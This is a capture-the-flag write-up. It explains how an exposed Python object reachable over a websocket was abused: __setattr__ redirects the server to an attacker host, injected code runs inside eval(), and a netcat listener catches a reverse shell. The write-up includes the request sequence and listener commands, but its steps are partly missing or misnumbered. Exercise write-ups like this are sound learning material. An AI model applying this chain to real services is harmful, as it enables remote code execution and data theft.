Mr.President Feedback #Web/Pwn #CodeInjection #python #shell

By: Diogo, Filipe, Vasco and João


31 solves, 460 points

One of the candidates has just launched feedback form for the electors. We need to analyze data from that server to gain advantage at upcoming debates. If you get sensitive data, we will pay a lot. Feedback form->website

The website consisted of a webclient that make requests with a websocket to a server and a fake submit method.
In the websockets message we could see the messages sent to the server:
{"method":"generate"} and {"method":"check","args":["1872b9691b5675183546f11b133aa30a","chaptaSolution"]}

Exposed Object methods

After this we tried to find more methods. If we send {"method": "__dir__"} we get a list of all attributes and methods as you can see below (received methods and attributes):


Abusing exposed methods

With method ` setattr we could change ip and port of our server, then we request to reconnect and we have it binded to our server.<br> When we request {“method”:”generate”}` to the server it will ask to our server the available operations splited by spaces. When we send the existing operations the server makes someting like:

	eval("1 "+rand(operationsReceived)+"2")

and asks us to make the chapa for that operation. In the eval we could inject code by sending it like an operation. Notice however that the code can’t have spaces because that is what is used to split the possible operations.


    1. Get IP:>curl -s

    2. Run Netcat Listener:> nc -l -p 22222

    1. Get IP: >curl -s

    2. Run Netcat Listener:> nc -l -p 9999

  3. Use exposed methods to change destination server with WebSocket Requests:
    1. {"method":"__setattr__", "args":["_port",22222]}
    2. {"method":"__setattr__", "args":["_server",""]}
    3. {"method":"reconnect"}
    4. {"method":"generate"}
  4. When we receive supported_operations in port 22222 we send our reverse shell that is going to be executed in eval:
  5. Send something in 22222:

At this moment we should have a shell listening on port 9999, and we get ctfzone{87a55d7e34aae098be0316df6b8035e4} with comand "cat"